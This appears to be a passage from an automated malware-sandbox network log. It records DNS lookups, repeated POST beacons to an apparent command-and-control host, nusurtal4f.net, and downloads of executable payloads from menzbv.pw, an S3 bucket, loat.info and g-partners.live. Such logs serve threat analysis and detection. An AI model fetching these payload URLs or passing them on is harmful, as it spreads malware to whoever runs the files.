                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 230
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:10 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 8
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 188
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:10 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 327
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 192
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:10 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 47
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 328
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:13 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 327
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 331
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:13 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 72
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 243
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:13 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 327
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 249
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:13 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 57
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 318
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:13 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 66
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 313
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:16 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 327
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 311
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:16 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 44
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 214
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:17 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 327
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 158
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:17 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 327
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 224
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:17 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 60
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 364
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:19 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 327
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 180
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:19 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 109
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 299
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:21 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 327
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 307
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:22 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 327
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 257
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:22 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 45
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 143
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:23 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 327
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 308
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:23 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 368
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:24 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 327
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 209
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:24 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 201
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:25 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 327
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 308
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:26 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 181
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:27 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 327
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          menzbv.pw
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          menzbv.pw
                                                                                          IN A
                                                                                          Response
                                                                                          menzbv.pw
                                                                                          IN A
                                                                                          111.90.146.149
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://menzbv.pw/adsli/md9_1sjm.exe
                                                                                          Remote address:
                                                                                          111.90.146.149:80
                                                                                          Request
                                                                                          GET /adsli/md9_1sjm.exe HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Host: menzbv.pw
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Content-Type: application/octet-stream
                                                                                          Last-Modified: Fri, 09 Jul 2021 09:13:37 GMT
                                                                                          Accept-Ranges: bytes
                                                                                          ETag: "7e4971b3a274d71:0"
                                                                                          Server: Microsoft-IIS/8.5
                                                                                          Date: Fri, 09 Jul 2021 23:04:04 GMT
                                                                                          Content-Length: 806400
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          ezzouhour.s3.eu-west-1.amazonaws.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          ezzouhour.s3.eu-west-1.amazonaws.com
                                                                                          IN A
                                                                                          Response
                                                                                          ezzouhour.s3.eu-west-1.amazonaws.com
                                                                                          IN CNAME
                                                                                          s3-r-w.eu-west-1.amazonaws.com
                                                                                          s3-r-w.eu-west-1.amazonaws.com
                                                                                          IN A
                                                                                          52.218.106.72
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://ezzouhour.s3.eu-west-1.amazonaws.com/recMe/irec7.exe
                                                                                          Remote address:
                                                                                          52.218.106.72:443
                                                                                          Request
                                                                                          GET /recMe/irec7.exe HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Host: ezzouhour.s3.eu-west-1.amazonaws.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          x-amz-id-2: OzIY5xr77YCtz4cPnGJ8phvT7nOAHlA+6lmu2k3eys04flym4aeGcGggvRvo6hsJtGPwPmmhwhU=
                                                                                          x-amz-request-id: 9228EX0MDYNYPDTK
                                                                                          Date: Fri, 09 Jul 2021 23:04:07 GMT
                                                                                          Last-Modified: Fri, 09 Jul 2021 14:49:29 GMT
                                                                                          ETag: "912e3bdf2de1c6096b761220c3d4a34e"
                                                                                          Accept-Ranges: bytes
                                                                                          Content-Type: application/x-msdownload
                                                                                          Server: AmazonS3
                                                                                          Content-Length: 768387
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          g-partners.live
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          g-partners.live
                                                                                          IN A
                                                                                          Response
                                                                                          g-partners.live
                                                                                          IN A
                                                                                          176.113.115.136
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://g-partners.live/installer.php?pub=azed
                                                                                          Remote address:
                                                                                          176.113.115.136:80
                                                                                          Request
                                                                                          GET /installer.php?pub=azed HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Host: g-partners.live
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:04:06 GMT
                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                          X-Powered-By: PHP/5.4.16
                                                                                          Keep-Alive: timeout=5, max=100
                                                                                          Connection: Keep-Alive
                                                                                          Transfer-Encoding: chunked
                                                                                          Content-Type: text/html
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          loat.info
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          loat.info
                                                                                          IN A
                                                                                          Response
                                                                                          loat.info
                                                                                          IN A
                                                                                          172.67.208.9
                                                                                          loat.info
                                                                                          IN A
                                                                                          104.21.53.24
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://loat.info/5b4d832ed4ec58c8ef741d63495c42e5.exe
                                                                                          Remote address:
                                                                                          172.67.208.9:443
                                                                                          Request
                                                                                          GET /5b4d832ed4ec58c8ef741d63495c42e5.exe HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Host: loat.info
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:04:06 GMT
                                                                                          Content-Type: application/octet-stream
                                                                                          Content-Length: 4678696
                                                                                          Connection: keep-alive
                                                                                          Last-Modified: Fri, 09 Jul 2021 22:29:19 GMT
                                                                                          Cache-Control: max-age=1800
                                                                                          CF-Cache-Status: HIT
                                                                                          Age: 2087
                                                                                          Accept-Ranges: bytes
                                                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
